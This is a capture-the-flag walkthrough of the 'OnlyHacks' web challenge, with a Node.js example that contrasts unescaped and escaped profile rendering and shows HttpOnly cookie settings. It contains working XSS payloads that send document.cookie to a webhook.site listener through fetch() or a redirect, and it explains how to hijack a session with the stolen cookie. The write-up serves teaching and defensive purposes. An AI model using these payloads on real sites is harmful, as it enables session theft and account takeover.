Tag: Walkthrough
OnlyHacks
Summary
This Valentine’s-themed web challenge focuses on exploiting Cross-Site Scripting (XSS) to steal a cookie, hijack an account, and retrieve the flag.
Write-up
The login page appears resistant to basic SQL injection and authentication bypass attempts, so we move on to the Sign Up function.
The signup process requires a profile picture upload, which is worth noting as a potential file-upload vector, but it is not the path this challenge hinges on.
Moving on to the Dashboard.
Upon reaching the dashboard, swiping through profiles reveals usernames rather than nicknames, as dashboard.js indicates. This suggests two possible attack vectors: XSS within the chat functionality, or exploiting the web Large Language Model (LLM) integrated into the chatbot. I initially pursued the web LLM angle, influenced by my experience with tools like ChatGPT and Gemini. However, this proved to be a misdirection; the challenge actually involves a simpler XSS vulnerability.
Let's try some basic XSS with:
<script>alert(1)</script>
We've confirmed the XSS vulnerability. Now, let's craft a payload that sends document.cookie to a listener we control (with mode: 'no-cors' the response is opaque to the page, but the request is still sent):
<script>fetch('https://webhook.site/b7e66...',{method: 'POST', mode: 'no-cors', body:document.cookie}); </script>
Or
<script>document.location="https://webhook.site/b7e66.../?cookie="+document.cookie</script>
Replace our own session cookie with the one captured by the webhook (for example via the browser's DevTools) and refresh the page to get the flag. This works because the session cookie is not marked HttpOnly, so document.cookie can read it.
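As an added example (not code from the OnlyHacks challenge or its author), the following Node.js snippet shows the rendering pattern behind this bug and its fix: a profile card built by concatenating the username straight into markup, next to a version that HTML-escapes every untrusted value, plus the Set-Cookie flags that would have stopped document.cookie from being readable in the first place. The function names, the profile fields, and the assumption that the username is what the dashboard renders unescaped are mine for illustration; the webhook URL is a placeholder.

```javascript
// Added example (not from the OnlyHacks challenge source): how a profile/chat
// renderer becomes XSS-vulnerable, and the hardened form. Function and field
// names are assumptions for illustration.

// Minimal HTML escaper, safe for text nodes and double-quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the username is concatenated straight into markup, which is
// exactly the pattern that lets <script>alert(1)</script> in a username run in
// every victim's browser when the dashboard renders that profile.
function renderProfileVulnerable(profile) {
  return `<div class="card"><h2>${profile.username}</h2><p>${profile.bio}</p></div>`;
}

// Hardened: every untrusted value is escaped before it enters markup.
function renderProfileSafe(profile) {
  return `<div class="card"><h2>${escapeHtml(profile.username)}</h2><p>${escapeHtml(profile.bio)}</p></div>`;
}

// Crude check used here only to show the difference between the two renderers:
// does the output still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Server side: HttpOnly keeps the cookie out of document.cookie entirely, so
// even a successful injection cannot exfiltrate it; Secure and SameSite limit
// where it travels.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed sample: an attacker-registered account whose username carries
// the cookie-stealing payload from the write-up (webhook URL is a placeholder).
const attacker = {
  username: '<script>document.location="https://webhook.site/PLACEHOLDER/?cookie="+document.cookie</script>',
  bio: "just here for the flag",
};

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", renderProfileVulnerable(attacker));
  console.log("safe:      ", renderProfileSafe(attacker));
  console.log("cookie:    ", sessionCookieHeader("session", "abc123"));
}
```

Run it with node to see the vulnerable output contain the raw script tag while the safe output only contains &lt;script&gt;. In a real app, prefer setting textContent on DOM nodes or a templating engine with auto-escaping over a hand-rolled escaper, and treat HttpOnly as the backstop rather than the fix.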